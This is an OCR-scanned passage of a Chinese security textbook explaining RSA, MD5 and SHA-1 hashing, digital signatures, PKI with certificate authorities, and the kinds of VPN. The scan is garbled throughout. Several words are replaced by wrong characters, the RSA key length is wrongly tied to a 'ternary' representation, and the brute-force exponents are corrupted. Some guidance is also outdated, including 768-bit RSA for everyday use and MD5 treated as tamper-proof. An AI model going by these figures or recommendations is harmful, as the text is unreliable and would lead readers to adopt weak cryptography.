仍 用 前 面 的 例子 来 说 明 如 何 使 用 非 对 称 加 密 算法 来 交换 消息 ， 小 红 需 要 通过 电子 邮件 给 小 
明 发 送 一 个 机 密 文档 。 首 先 ， 小 明 使 用 电子 邮件 将 自己 的 公 钥 发 送 给 小 红 。 然 后 小 红 用 小 
明 的 公 钥 对 文档 加 密 并 通过 电子 邮件 将 加 密 消息 发 送 给 小 明 。 由 于 任何 用 小 明 的 公 和 钥 加 密 
的 消息 只 能 用 小 明 的 私 钥 解密 ， 因 此 即使 窥探 者 知道 小 明 的 公 钥 ， 消 息 也 仍 是 安全 的 。 小 
明 在 收 到 加 密 消息 后 ， 用 自己 的 私 钥 进 行 解密 从 而 恢复 原始 文档 。 
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因为 非 对 称 加 密 算法 可 以 把 加 密 密 钥 和 算法 公开 ， 所 以 任何 人 都 可 用 之 来 加 密 要 传送 
的 明文 信息 。 但 只 有 拥有 解密 密 钥 的 人 才能 将 传送 过 来 的 已 经 加 了 密 的 消息 解密 ， 还 原 原 
信息 。 

在 公 钥 密码 体系 出 现 之 前 ， 几 乎 所 有 的 密码 编码 系统 都 建立 在 基本 的 代替 和 换 位 的 基 
础 上 ， 公 钥 密码 体系 与 以 前 的 所 有 方法 都 截然 不 同 ， 公 和 钥 密码 算法 基于 数学 函数 而 不 是 代 
蔡 和 换 位 操作 ， 而 且 公 钥 密码 体制 是 非 对称 的 ， 私 钥 为 密码 拥有 者 保管 ， 不 涉及 分 发 问题 ， 
公 钥 采取 公开 渠道 分 发 而 不 影响 安全 性 ， 大 大 提高 密 钥 分 发 的 方便 性 。 公 钥 密 码 体制 的 出 
现 解决 了 对 称 密码 体制 中 的 密 钥 管理 、 分 发 和 数字 签名 难题 。 

非 对 称 加 密 算法 的 例子 有 RSA、Elgamal 和 ECC( 椭 圆 曲 线 加密 算 法 )。RSA 是 目前 最 
常用 的 算法 。Elgamal 是 另 一 种 常用 的 非 对 称 加 密 算法 。 

RSA 算法 是 第 一 个 能 同时 用 于 加 密 和 数字 签名 的 非 对 称 密码 算法 ， 算 法 的 名 字 以 发 明 
者 的 名 字 Ron Rivest、AdiShamir 和 Leonard Adleman 命名 。 该 算法 也 是 被 研究 得 最 广泛 的 
公 钥 算法 ， 从 提出 到 现在 已 近 二 十 年 ， 经 历 了 各 种 攻击 的 考验 ， 成 为 被 普遍 认为 是 目前 最 
优秀 的 公 钥 方案 之 一 。 它 利用 两 个 很 大 的 质数 相 乘 所 产生 的 乘积 来 加 密 。 这 两 个 质数 无 论 
哪 一 个 先 与 原文 件 编码 相 乘 ， 对 文件 加 密 ， 均 可 由 另 一 个 质数 再 相 乘 来 解密 。 但 要 用 一 个 
质数 来 求 出 另 一 个 质数 ， 则 是 十 分 困难 的 。 因 此 将 这 一 对 质数 称 为 密 钥 对 (Key Pair)。 在 加 
密 应 用 时 ， 某 个 用 户 总 是 将 一 个 密 钥 公 开 ， 让 发 信 的 人 将 信息 用 其 公共 密 钥 加 密 后 发 给 该 
用 户 ， 而 一 旦 信息 加 密 后 ， 只 有 用 该 用 户 一 个 人 知道 的 私 用 密 钥 才能 解密 。 具 有 数字 凭证 
身份 的 人 员 的 公共 密 钥 可 在 网 上 查 到 ， 亦 可 在 请 对 方 发 信息 时 主动 将 公共 密 钥 传 给 对 方 ， 
这 样 保证 在 Internet 上 传输 信息 的 保密 和 安全 。 

1)” 密 钥 生 成 

RSA 的 算法 涉及 三 个 参数 ，n、e、d， 其 中 n 被 称 为 模 数 ， 是 两 个 大 质数 p、q 的 积 ，n 
的 三 进 制 表示 时 所 占用 的 位 数 ， 就 是 所 谓 的 密 钥 长 度 。e 和 d 是 一 对 相关 的 值 ，e 可 以 任意 
取 ， 但 要 求 e 与 (p-1)x(q-1) 互 质 ， 再 选择 d: 要 求 (dxe-1) 能 被 (p-1)x(q-1) 整 除 。 值 e 和 dd 
分 别称 为 公共 指数 和 私有 指数 。 公 钥 是 数 对 mm，e)， 密 钥 是 数 对 (n，d)。 

2) 加密 

获得 信息 接收 者 的 公开 密 钥 (n，e)。 

(1) 将 明文 分 组 : m=m0，ml，m2，…，mk-1。 使 得 mi<n(i=0，1，…，k-l)。 

(2) 对 每 一 组 明文 用 一 下 公式 做 加 密 变 换 ci=E(mi)=mie(mod n)。 

(3) 得 到 密 文 c=c0，c1，c2，…，ck-1。 

3) ”解密 

(1) 对 每 一 密 文 做 解密 变换 mi=D(ci)=cd (mod n)。 

(2) 合并 分 组 得 到 的 明文 m=m0，ml，m2，…，mk-1l。 

知道 公 钥 可 以 得 到 获取 私 钥 的 途径 ， 但 这 取决 于 将 模 数 因 式 分 解 成 组 成 它 的 质数 。 如 
果 选 择 了 足够 长 的 密 钥 ,这 样 基本 上 不 可 能 获取 私 钥 .-RSA 实验 室 建议 : 普通 公司 密 钥 1 024 
位 就 已 足够 。 对 极其 重要 的 资料 ， 就 用 双 倍 的 大 小 的 2 048 位 。 日 常 使 用 768 位 就 能 满足 
要 求 。 

密 钥 长 度 增 加 时 会 影响 加 密 / 密 的 速度 ， 所 以 这 里 有 一 个 权衡 。 将 模 数 加 倍 将 使 得 使 用 
公 钥 的 操作 时 间 大 概 增加 为 原来 的 4 倍 ， 而 用 私 钥 加 密 / 解 密 所 需 的 时 间 增 加 为 原来 的 8 
倍 。 进 一 步 说 ， 当 模 数 加 倍 时 ， 生 成 密 钥 的 时 间 平 均 将 增加 为 原来 的 16 倍 。 
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6.2.3” 单 向 散 列 算法 


单 向 散 列 函数 指 的 是 根据 输入 消息 (任何 字 节 串 ， 如 文本 字符 串 、Word 文档 、JPG 文 
件 等 ) 输 出 固定 长 度数 值 的 算法 ， 输 出 数值 也 称 为 “ 散 列 值 ”或 “消息 摘要 ”， 其 长 度 取决 
于 所 采用 的 算法 , 通常 在 128 一 256 位 。 单 向 散 列 函 数 旨 在 创建 用 于 验证 消息 完整 性 的 简短 
摘要 。 在 诸如 TPC/IP 等 通信 协议 中 ， 常 采用 检验 和 或 CRC( 循 环 匈 余 校 验 ) 来 验证 消息 的 完 
整 性 。 消 息 发 送 方 计算 消息 的 校 验 和 并 将 其 随 消息 一 起 发 送 ， 接 收 方 重新 计算 校 验 和 并 将 
其 与 收 到 的 校 验 和 相 比 较 ， 如 果 两 者 不 同 ， 接 收 方 就 认为 消息 在 传送 过 程 中 受 损 ， 并 要 求 
发 送 方 重新 发 送 。 如 果 预 计 的 损坏 原因 是 电信 号 错误 或 其 他 自然 现象 ， 这些 方法 是 可 行 的 。 
但 如 果 预 计 的 原因 是 恶意 的 狐 独 攻击 者 的 故意 破坏 ， 则 需要 更 强 的 机 制 ， 在 这 种 情况 下 ， 
强加 密 单 向 散 列 函数 便 可 派 上 用 场 。 

强加 密 单 向 散 列 函数 是 这 样 设 计 的 : 不 可 能 通过 计算 找 出 两 条 散 列 值 相同 的 消息 。 对 
于 校 验 和 狼 猫 的 攻击 者 可 以 轻易 地 对 消息 进行 修改 , 并 使 其 校 验 和 与 原 消息 的 校 验 和 相同 ; 
而 对 于 循环 元 余 校 验 ， 达 到 这 样 的 目的 也 不 困难 。 但 强加 密 单 向 散 列 函数 却 能 令 这 一 目标 
遥 不 可 及 。 

MD5 和 SHA-1 是 两 种 强加 密 单 向 散 列 算法 , 其 中 MD5 是 Ron Rivest(RSA 算法 的 发 明 
者 之 一 ) 于 1992 年 发 明 的 ， 该 算法 生成 128 位 的 散 列 值 ; 而 SHA-1 是 由 美国 国家 标准 与 技 
术 研 究 院 (National Institute of Standards and Technology, NIST) 于 1995 年 发 明 的 , 它 生成 160 
位 的 散 列 值 。SHA-1 的 计算 速度 比 MD5 慢 ， 但 由 于 生成 的 散 列 值 更 长 而 被 认为 具有 更 强 
的 加 密 能 力 。 

对 SHA-1 单 向 散 列 算法 的 破解 。 

2005 年 2 月 , 中 国 山东 大 学 的 研究 者 王小云 发 表 了 一 篇 论文 , 演示 了 使 用 SHA-1 算法 
找 出 两 条 能 生成 相同 散 列 值 的 消息 ， 这 种 情况 称 为 “碰撞 ”。 单 向 散 列 算法 的 目的 和 好 处 
是 能 使 不 同 的 消息 生成 不 同 的 散 列 值 ， 只 有 穷 举 所 有 可 能 情况 才能 找 出 碰撞 ， 这 种 做 法 称 
为 “ 蛮 力 ”攻击 ， 需 要 执行 28( 约 10 闪 ，!1 百 万 亿 亿 ) 次 散 列 运算 。 但 此 项 新 研究 显示 ， 通 
过 23( 约 5x10 ”，500 亿 亿 ) 次 散 列 运算 便 有 可 能 找 出 碰撞 。 

实际 上 ， 这 没有 什么 大 不 了 的 。 例 如 ， 没 人 能 在 修改 X.509 数字 证 书 中 Web 地 址 的 同 
时 使 证 书 和 签署 时 一 样 。 但 这 如 同 盔 甲 的 一 个 小 瑕 症 ， 随 着 对 各 种 加 密 算法 更 具 威胁 的 攻 
击 方式 的 研究 ， 瑕 症 也 会 越 来 越 多 。 因 此 ， 总 体 建 议 是 : 应 该 考虑 放弃 SHA-1， 并 选择 更 
新 的 单 向 散 列 函数 ， 如 SHA-2 或 SHA-512。 

在 此 举 一 个 使 用 散 列 函数 的 例子 ， 假 设 某 个 开放 源码 项 目 将 其 产品 发 布 到 多 个 镜像 站 
点 以 供 下 载 , 并 在 主 站 提供 了 由 整个 下 载 文件 计算 得 到 的 MD5 散 列 值 。 如 果 攻 击 者 攻破 了 
一 个 镜像 站 点 ， 在 产品 中 插入 一 些 恶 意 代 码 ， 那 么 他 必须 能 调整 代码 的 其 他 部 分 ， 使 MD5 
的 输出 与 以 前 相同 。 如 果 使 用 的 是 校 验 和 或 CRC， 那么 攻击 者 便 很 容易 达到 目的 。 但 MD5 
是 专门 为 防止 这 种 攻击 而 设计 的 , 因此 任何 人 下 载 了 修改 过 的 文件 后 , 通过 检查 MD5 散 列 
值 都 将 发 现 文件 已 不 是 原来 的 。 

再 举 一 个 例子 , 假设 通信 双方 使 用 TCP/IP 连接 进行 通信 。TCP 使 用 CRC 来 校 验 消 息 ， 
但 正如 前 面 所 提 到 的 ，CRC 是 可 攻破 的 。 因此， 为 提高 安全 性 ,假设 通信 双方 在 TCP 协议 
之 上 使 用 了 这 样 一 种 应 用 层 协 议 : 在 每 条 消息 末尾 加 上 MD5 散 列 值 。 假设 攻击 者 处 于 通信 
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双方 之 间 ， 并 能 够 修改 TCP 流 的 内 容 ， 那 么 他 能 攻破 MD5 校 验 吗 ? 

如 果 经 验证 他 能 攻破 , 攻击 者 只 需 修改 数据 流 , 然后 根据 新 数据 重新 计算 MD5 散 列 值 ， 
并 将 其 加 在 消息 后 面 。 由 于 通信 数据 可 以 是 任何 内 容 (如 在 即时 通信 信道 上 进行 的 动态 对 
话 )， 因 此 通信 双方 无 法 校 验 MD5 值 。 

对 于 散 列 函 数 , 与 任何 加 密 算法 一 样 ,明智 的 开发 人 员 会 选择 一 种 经 实践 检验 的 算法 ， 
而 不 是 从 头 开发 。 经 实践 检验 的 算法 都 经 过 大 量 的 详细 审查 ， 如 MD5 和 SHA-1 算法 ,但 
也 有 很 多 算法 因为 漏洞 和 弱点 而 被 淘汰 了 。 


6.2.4 数字 签名 


在 文件 上 手写 签名 长 期 以 来 被 用 作 作 者 身份 的 证 明 ， 或 表明 签名 者 同意 文件 内 容 。 签 
名 体现 了 以 下 几 个 方面 的 保证 。 

(1) 签名 可 信 ， 签 名 使 得 文件 的 接受 者 相信 签名 者 是 很 认真 地 签名 的 。 

(2) 签名 不 可 伪造 ， 签 名 证 明 是 签名 者 而 不 是 其 他 人 在 文件 上 签字 。 

(3) 签名 不 可 重复 使 用 ， 是 文件 的 一 部 分 ， 不 能 将 其 移动 到 其 他 的 文件 上 。 

(4) 签名 不 可 抵赖 。 签 名 者 事后 要 承认 签 了 名 。 

信息 时 代 ， 计 算 机 网 络 技术 高 度 发 展 ， 加 密 技术 已 经 渗透 到 人 们 的 日 常生 活 中 ， 改 变 
了 传统 的 事务 处 理 方式 。 互 联网 上 ， 人 们 需要 通过 数字 通信 网 络 传递 贸易 合同 。 数 字 签 名 
就 是 为 了 解决 在 网 络 上 如 何 表示 自己 身份 ， 如 何 确保 数据 的 完整 性 、 私 有 性 和 不 可 抵赖 
性 的 。 

数字 签名 (Digital Signature) 是 一 种 基于 密码 的 身份 鉴别 技术 。 以 往 的 书信 或 文件 是 根据 
亲笔 签名 或 印章 来 证 明 其 真实 性 的 。 但 在 计算 机 网 络 中 传送 的 报 文 又 如 何 盖 章 呢 ? 这 就 是 
数字 签名 所 要 解决 的 问题 。 数 字 签 名 必须 保证 以 下 几 点 : 接收 者 能 够 核实 发 送 者 对 报 文 的 
签名 ;发 送 者 事后 不 能 抵赖 对 报 文 的 签名 ; 接收 者 不 能 伪造 对 报 文 的 签名 。 

现在 已 有 多 种 实现 数字 签名 的 方法 ， 但 采用 公开 密 钥 算法 要 比 常规 算法 更 容易 实现 。 
数字 签名 通常 包括 两 个 不 同 的 过 程 : 数字 签名 的 创建 和 数字 签名 的 验证 ， 分 别 由 签名 者 和 
接收 者 执行 。 数 字 签 名 的 创建 使 用 从 被 签名 的 消息 及 给 定 的 私有 密 钥 两 者 导出 唯一 于 它们 
的 散 列 结果 和 数字 签名 。 为 保证 散 列 结果 的 安全 性 ， 要 使 由 任何 其 他 消息 和 私有 密 钥 的 组 
合 ， 而 创建 得 到 相同 散 列 结果 和 数字 签名 的 概率 极其 微小 。 数 字 签 名 的 验证 是 通过 参照 原 
始 消息 和 给 定 的 公开 密 钥 来 检查 数字 签名 的 过 程 ， 它 判断 数字 签名 是 否 由 对 相同 的 消息 使 
用 对 应 于 所 引用 的 公开 密 钥 的 私有 密 钥 而 创建 得 到 的 ， 如 图 6-5 所 示 。 
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图 6-5 数字 签名 的 创建 过 程 
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图 6-5 描述 的 是 数字 签名 的 创建 过 程 。 为 了 对 文档 或 任何 其 他 形式 的 信息 进行 签名 ， 
签名 者 必须 首先 精确 界定 所 要 签名 的 范围 ， 界 定 后 的 待 签名 信息 称 为 “消息 ”。 然 后 ， 签 
名 者 的 软件 中 的 散 列 函数 计算 出 一 个 唯一 于 消息 的 散 列 结果 ， 签 名 者 的 软件 接着 使 用 签名 
者 的 私有 密 钥 将 散 列 结果 转换 成 数字 签名 。 所 得 到 的 数字 签名 因而 唯一 用 来 创建 它 的 消息 
和 私有 密 钥 。 图 6-5 中 的 签名 函数 的 作用 实际 上 就 是 用 私有 密 钥 对 散 列 结果 解密 得 到 数字 
签名 。 

数字 签名 的 验证 是 通过 使 用 与 创建 数字 签名 时 所 用 的 相同 散 列 函 数 ， 对 原始 消息 计算 
新 的 散 列 结果 而 实现 的 。 验 证 者 然后 使 用 公开 密 铀 和 新 的 散 列 结果 检查 。 

(1) 数字 签名 是 不 是 使 用 对 应 的 私有 密 钥 而 创建 的 。 

(2) 计算 出 的 新 散 列 结果 是 否 与 在 签名 过 程 中 转换 为 数字 签名 的 原始 散 列 结果 匹配 ， 
如 图 6-6 所 示 。 
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图 6-6 数字 签名 的 验证 
6.2.5 ” 公 钥 基础 设施 


公 钥 基础 设施 PKICPublic Key Infrastructure) 是 一 种 较 新 的 安全 技术 ， 它 利用 公 铀 概念 
和 加 密 技术 为 网 上 通信 提供 整套 的 安全 基础 平台 。 能 为 各 种 不 同安 全 需求 的 用 户 提供 网 上 
安全 服务 ， 主 要 有 身份 识别 与 鉴别 (认证 )、 数 据 保密 性 、 数 据 完整 性 、 不 可 否认 性 及 时 间 
规 服 务 等 。 用 户 利用 PKI 所 提供 的 这 些 安全 服务 进行 安全 通信 ， 以 及 不 可 否认 的 安全 电子 
交易 活动 。 现 在 世界 范围 内 ，PKI 已 得 到 广泛 的 应 用 ， 如 安全 电子 邮件 、Web 访问 、 虚 拟 
专用 网 络 VPN 和 本 地 简单 登录 认证 ， 以 及 电子 商务 、 电 子 政务 、 网 上 银行 和 网 上 证 券 交易 
等 各 种 强 认 证 系统 都 应 用 了 PKI 技术。 

PKI 公 钥 基础 设施 由 公开 密 钥 密码 技术 、 数 字 证 书 、 证 书 发 放 机 构 (CA) 和 关于 公开 密 
钥 的 安全 策略 等 基本 成 分 共同 组 成 的 , 目的 是 为 了 管理 密 钥 和 证 书 . 一 个 机 构 通过 采用 PKI 
框架 管理 密 钥 和 证 书 可 以 建立 一 个 安全 的 网 络 环境 。 一 个 典型 、 完 整 、 有 效 的 PKI 应 用 系 
统 至 少 应 具有 以 下 五 个 部 分 。 

1. 认证 中 心 CA 

CA 是 PKI 的 核心 ，CA 负责 管理 PKI 结构 下 的 所 有 用 户 ( 包 括 各 种 应 用 程序 ) 的 证 书 ， 
把 用 户 的 公 钥 和 用 户 的 其 他 信息 捆绑 在 一 起 , 在 网 上 验证 用 户 的 身份 , CA 还 要 负责 用 户 证 
书 的 黑 名 单 登记 和 黑 名 单 发 布 。 
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2. X.500 目录 服务 器 


X.500 目录 服务 器 用 于 发 布 用 户 的 证 书 和 黑 名 单 信息 ， 用 户 可 通过 标准 的 LDAP 协议 
查询 自己 或 其 他 人 的 证 书 和 下 载 黑 名 单 信息 。 


3. 具有 高 强度 密码 算法 (SSL) 的 安全 


WWW 服务 器 Secure socket layer(SSL) 协 议 最 初 由 Netscape 企业 发 展 ， 现 已 成 为 网 络 
用 来 鉴别 网 站 和 网 页 浏览 者 身份 ， 以 及 在 浏览 器 使 用 者 及 网 页 服务 器 之 间 进 行 加 密 通 信 的 
全 球 化 标准 。 

4. Web( 安 全 通信 平台 


Web 有 Web Client 端 和 Web Server 端 两 部 分 ， 分 别 安装 在 客户 端 和 服务 器 端 ， 通 过 
具有 高 强度 密码 算法 的 SSL 协议 保证 客户 端 和 服务 器 端 数据 的 机 密 性 、 完整 性 、 身份 验 证 。 


5. 自 开 发 安全 应 用 系统 


自 开 发 安全 应 用 系统 是 指 各 行业 自 开 发 的 各 种 具体 应 用 系统 ， 例 如 银行 、 证 券 的 应 用 
系统 等 。 完 整 的 PKI 包括 认证 政策 的 制定 (包括 遵循 的 技术 标准 、 各 CA 之 间 的 上 下 级 或 
同 级 关系 、 安 全 策略 、 安 全 程度 、 服 务 对 象 、 管 理 原则 和 框架 等 )、 认 证 规则 、 运 作 制 度 的 
制定 、 所 涉及 的 各 方法 律 关 系 内 容 以 及 技术 的 实现 等 。 

前 面 已 经 知道 : 普通 的 对 称 密码 学 中 加 密 和 解密 使 用 同一 个 密 铀 。 对 称 加 密 算法 简便 
高 效 、 密 钥 简短 、 破 译 困难 ， 由 于 系统 的 保密 性 主要 取决 于 密 钥 的 安全 性 ， 所 以 ， 在 公开 
的 计算 机 网 络 上 安全 地 传送 和 保管 密 钥 是 重要 问题 。 因 对 称 密码 学 中 双方 使 用 相同 的 密 钥 ， 
故 无 法 实现 数据 签名 和 不 可 否认 性 等 功能 。 而 非 对 称 密码 学 ， 具 有 两 个 密 钥 ， 一 个 公 钥 一 
个 私 铀 ， 它 们 具有 这 样 的 性 质 : 用 公 钥 加 密 的 文件 只 能 用 私 钥 解密 ， 而 用 私 钥 加 密 的 文件 
只 能 用 公 钥 解密 。 公 钥 是 公开 的 ， 所 有 的 人 都 可 以 用 它 ， 私 钥 是 私有 的 ， 具 有 唯一 性 ， 不 
应 被 其 他 人 得 到 。 这 就 可 以 满足 电子 商务 中 的 一 些 安全 要 求 。 比 如 说 要 证 明 某 个 文件 是 特 
定 某 个 人 的 ， 这 个 人 就 可 以 用 他 的 私 钥 对 文件 加 密 ， 别 人 如 果 能 用 他 的 公 钥 解密 该 文件 ， 
说 明 此 文件 就 是 这 个 人 的 , 这 可 以 说 是 一 种 认证 的 实现 。 如 果 只 想 让 某 个 人 看 到 一 个 文件 ， 
就 用 此 人 的 公 钥 加 密 文 件 然后 传 给 他 ， 而 该 文件 只 有 用 特定 私 钥 才 可 以 解密 ， 这 就 是 保密 
性 的 实现 。 基 于 这 种 原理 还 可 以 实现 完整 性 。 这 是 PKI 依赖 的 核心 思想 。 

当 传 送 机 密 文件 时 ， 我 们 首先 会 想到 用 对 称 密码 将 文件 加 密 ， 而 在 把 加 密 后 的 文件 传 
送 给 接受 者 后 ， 我 们 又 必须 让 接收 方 知道 解密 用 的 密 钥 ， 这 就 产生 了 新 的 问题 : 如 何 保密 
的 传输 该 密 钥 ? 此 时 发 现 传输 对 称 密 钥 不 绝对 可 靠 。 后 来 改 用 非 对 称 密码 的 技术 加 密 。 又 
产生 了 新 的 问题 : 如 何 确定 该 公 钥 就 是 某 个 人 的 ? 比如 说 我 们 想 传 给 A 一 个 文件 ， 于 是 开 
始 查找 A 的 公 铀 ， 但 是 这 时 B 从 中 捣乱 ， 蔡 换 了 A 的 公 钥 ， 让 我 们 错误 地 认为 B 的 公 钥 
就 是 A 的 公 钥 ， 导 致 我 们 最 终 使 用 B 的 公 钥 加 密 文件 ， 结 果 A 无 法 打开 文件 ， 而 B 可 以 
打开 文件 ， 这 样 B 就 实现 了 对 保密 信息 的 窃取 行为 。 因 此 采用 非 对 称 密码 技术 ， 仍 然 无 法 
保证 保密 性 的 实现 ， 如 何 才 能 确切 地 得 到 想 要 的 人 的 公 钥 是 权威 的 仲裁 机 构 
CA(Certification Authority) 的 主要 工作 ，CA 能 准确 无 误 地 提供 我 们 需要 的 人 的 公 钥 。 

PKI 中 ， 值 得 信赖 而 且 独 立 的 第 三 方 机 构 充当 认证 中 心 (Certification Authority，CA)， 
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来 确认 公 钥 拥有 人 的 真正 身份 。 就 像 公安 局 发 放 的 身份 证 一 样 ， 认 证 中 心 发 放 一 个 叫 “ 数 
字 证 书 ” 的 身份 证 明 。 该 数字 证 书包 含 了 用 户 身份 的 部 分 信息 及 用 户 所 持 有 的 公 钥 。 像 公 
安 局 对 身份 证 盖 章 一 样 ， 认 证 中 心 利用 本 身 的 私 钥 为 数字 证 书 加 上 数字 签名 。 任 何 想 发 放 
自己 公 钥 的 用 户 ， 可 以 去 认证 中 心 申 请 自己 的 证 书 。 认 证 中 心 在 鉴定 该 人 的 真实 身份 后 ， 
颁发 包含 用 户 公 钥 的 数字 证 书 。 其 他 用 户 只 要 能 验证 证 书 是 真实 的 ， 并 且 信 任 颁 发 证 书 的 
认证 中 心 ， 就 可 以 确认 用 户 的 公 钥 。 


6.3 VPN 技术 


现在 ， 越 来 越 多 的 公司 走向 国际 化 ， 一 个 公司 可 能 在 多 个 国家 都 有 办 事 机 构 或 销售 中 
心 ， 每 一 个 机 构 都 有 自己 的 局 域 网 LAN(Local Area Network)， 但 在 当今 的 网 络 社会 人 们 的 
要 求 不 仅 如 此 , 用户 希望 将 这 些 LAN 连接 在 一 起 组 成 一 个 公司 的 广域网 , 现在 做 到 这 些 已 
不 是 什么 难事 。 

事实 上 , 很 多 公司 都 已 经 这 样 做 了 , 但 他 们 一 般 使 用 租用 专用 线路 来 连接 这 些 局 域 网 ， 
他 们 考虑 的 就 是 网 络 的 安全 问题 。 现 在 具有 加 密 /解密 功能 的 路 由 器 已 到 处 都 是 ， 这 就 使 人 
们 通过 互联 网 连接 这 些 局 域 网 成 为 可 能 ， 这 就 是 我 们 通常 所 说 的 虚拟 专用 网 (Virtual Private 
Network，VPN)。 当 数据 离开 发 送 者 所 在 的 局 域 网 时 ， 该 数据 首先 被 用 户 端 连接 到 互联 网 
上 的 路 由 器 进行 硬件 加 密 ， 数 据 在 互联 网 上 是 以 加 密 的 形式 传送 的 ， 当 到 达 目 的 局 域 网 的 
路 由 器 时 ,该 路 由 器 就 会 对 数据 进行 解密 ,这 样 目的 局 域 网 中 的 用 户 就 可 以 看 到 真正 的 
信息 。 


6.3.1 VPN 技术 的 概述 


VPN 即 虚拟 专用 网 ， 是 一 种 “基于 公共 数据 网 ， 给 用 户 一 种 直接 连接 到 私人 局 域 网 感 
觉 的 服务 ”。 它 是 通过 一 个 公用 网 络 (通常 是 因特网 ) 建 立 一 个 临时 的 、 安 全 的 连接 ， 是 一 
条 穿 过 混乱 的 公用 网 络 的 安全 、 稳 定 的 隧道 。 

VPN 极 大 地 降低 了 用 户 的 费用 ,而 且 提供 了 比 传统 方法 更 强 的 安全 性 。 通常, VPN 是 
对 企业 内 部 网 的 扩展 ， 通 过 它 可 以 帮助 远程 用 户 、 公 司 分 支 机 构 、 商 业 伙 伴 及 供应 商 同 公 
司 的 内 部 网 建立 可 信 的 安全 连接 ， 并 保证 数据 的 安全 传输 。 

VPN 可 分 为 以 下 三 大 类 。 

(1) 企业 各 部 门 与 远程 分 支 之 间 的 Intranet VPN。 

(2) 企业 网 与 远程 (移动 ) 雇 员 之 间 的 远程 访问 (Remote Access)VPN。 

(3) 企业 与 合作 伙伴 、 客 户 、 供 应 商 之 间 的 Extranet VPN。VPN 可 用 于 不 断 增 长 的 移 
动用 户 的 全 球 因特网 接 入 ， 以 实现 安全 连接 ， 可 用 于 实现 企业 网 站 之 间 安 全 通信 的 虚拟 专 
用 线路 ， 用 于 经 济 有 效 地 连接 到 商业 伙伴 和 用 户 的 安全 外 联网 虚拟 专用 网 。 

VPN 架构 中 采用 了 多 种 安全 机 制 ， 如 隧道 技术 (Tunneling)、 加 解密 技术 (Encryption)、 
密 钥 管理 技术 、 身 份 认证 技术 (Authentication) 等 ， 通 过 上 述 的 各 项 网 络 安全 技术 ， 确 保 资 料 
在 公众 网 络 中 传输 时 不 被 窃取 ， 或 是 即使 被 窃取 了 ， 对 方 亦 无 法 读 取 数 据 包 内 所 传送 的 
资料 。 
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6.3.2 ”VPN 的 分 类 

根据 VPN 所 起 的 作用 ， 可 将 其 分 为 三 类 : 企业 内 部 虚拟 网 (Internet VPN)、 远 程 访问 
VPN(Remote Access VPN) 和 外 部 网 VPN(Extranet VPN)。 

1. 内 部 VPN 


在 公司 总 部 和 它 的 分 支 机 构 之 间 建 立 的 VPN。 这 是 通过 公用 网 络 将 一 个 组 织 的 各 分 支 
机 构 通过 VPN 连接 而 成 的 网 络 , 它 是 公司 网 络 的 扩展 。 当 一 个 数据 传输 通道 的 两 个 端点 认 
为 是 可 信 的 时 候 ， 公 司 可 以 选择 “内 部 网 VPN” 解 决 方案 ,安全 性 主要 在 于 加 强 两 个 VPN 
服务 器 之 间 的 加 密 和 认证 手段 上 。 大 量 的 数据 经 常 需要 通过 VPN 在 局 域 网 之 间 传 递 , 可 以 
把 中 心 数据 库 或 其 他 资源 连接 起 来 的 各 个 局 域 网 看 成 是 内 部 网 的 一 部 分 ， 如 图 6-7 所 示 。 


EEC 


6-7 ”内 部 网 VPN 


2. 远程 访问 VPN 

在 公司 总 部 和 远 地 雇 员 或 旅行 中 的 雇员 之 间 建 立 的 VPN。 如 果 一 个 用 户 在 家 里 或 在 旅 
途 之 中 ， 想 同 公司 的 内 部 网 建立 一 个 安全 连接 ， 可 以 用 “远程 访问 VPN ”来 实现 ， 实 现 过 
程 : 用 户 拨号 ISP(Intemet 服务 提供 商 ) 的 网 络 访问 服务 器 NAS(Network Access Server)， 
发 出 PPP 连接 请 求 ，NAS 收 到 呼叫 后 ， 在 用 户 和 NAS 之 间 建 立 PPP 链 路 ， 然 后 ，NAS 对 
用 户 进行 身份 验证 ， 确 定 是 合法 用 户 ， 就 启动 远程 访问 功能 ， 与 公司 总 部 内 部 连接 ， 访 问 
其 内 部 资源 ， 如 图 6-8 所 示 。 
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图 6-8 远程 访问 VPN 

公司 常 制定 一 种 “透明 的 访问 策略 ”， 即 使 在 远 地 的 雇员 也 能 像 坐 在 总 部 的 办 公 室 里 
一 样 自由 地 访问 公司 的 资源 。 因 此 首先 要 考虑 的 是 所 有 端 到 端的 数据 都 要 加 密 ， 并 且 只 有 
特定 的 接收 者 才能 解密 。 这 种 VPN 要 对 用 户 的 身份 进行 认证 ， 而 不 仅仅 认证 人 P 地 址 ， 这 
样 公司 就 会 知道 哪个 用 户 访问 公司 的 网 络 ， 认 证 后 决定 是 否 允 许 用 户 对 网 络 资源 的 访问 。 
一 旦 一 个 用 户 通过 公司 VPN 服务 器 的 认证 ， 根 据 他 的 访问 权限 表 ， 就 有 一 定 的 访问 权限 。 
每 个 人 的 访问 权限 表 由 网 络 管理 员 制 定 ， 并 且 要 符合 公司 的 安全 策略 。 有 较 高 安全 度 的 远 
程 访 问 VPN 应 能 截取 到 特定 主机 的 信息 流 ， 有 加 密 、 身 份 验证 、 过 滤 等 功能 。 


3. 外 部 网 VPN 


在 公司 和 商业 伙伴 、 顾 客 、 供 应 商 、 投 资 者 之 间 建 立 的 VPN。 外 部 网 VPN 为 公司 合 
作 伙 伴 、 顾 客 、 供 应 商 提供 安全 性 。 它 应 该 能 保证 包括 使 用 TCP 和 UDP 协议 的 各 种 应 用 
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服务 的 安全 ， 例 如 ， 电 子 邮 件 、HTTP、FTP、 数 据 库 的 安全 以 及 一 些 应 用 程序 的 安全 。 因 
为 不 同 公司 的 网 络 环境 是 不 相同 的 , 一 个 可 行 的 外 部 网 VPN 方案 应 该 能 适用 于 各 种 操作 平 
台 : 协议 、 各 种 不 同 的 认证 方案 及 加 密 算 法 。 

外 部 VPN 的 主要 目标 是 保证 数据 在 传输 过 程 中 不 被 修改 ， 保 护 网 络 资源 不 受 外 部 威 
胁 。 安 全 的 外 部 网 VPN 要 求 公司 在 同 他 的 顾客 、 合 作 伙伴 之 间 经 Internet 建立 端 到 端的 连 
接 时 ， 必 须 通过 VPN 服务 器 才能 进行 。 这 种 系统 上 ， 网 络 管理 员 可 以 为 合作 伙伴 的 职员 指 
定 特定 的 许可 权 , 如 可 允许 对 方 的 销售 经 理 访问 一 个 受到 保护 安全 的 服务 器 上 的 销售 报告 
如 图 6-9 所 示 。 


图 6-9 外 部 VPN 


外 部 网 VPN 应 该 是 一 个 加 密 、 认证 和 访问 控制 功能 组 成 的 集成 系统 。 通常 公司 将 VPN 
服务 器 放 在 用 于 隔离 内 外 部 网 的 防火 墙 上 ， 防 火 墙 阻止 所 有 来 历 不 明 的 信息 传输 。 所 有 经 
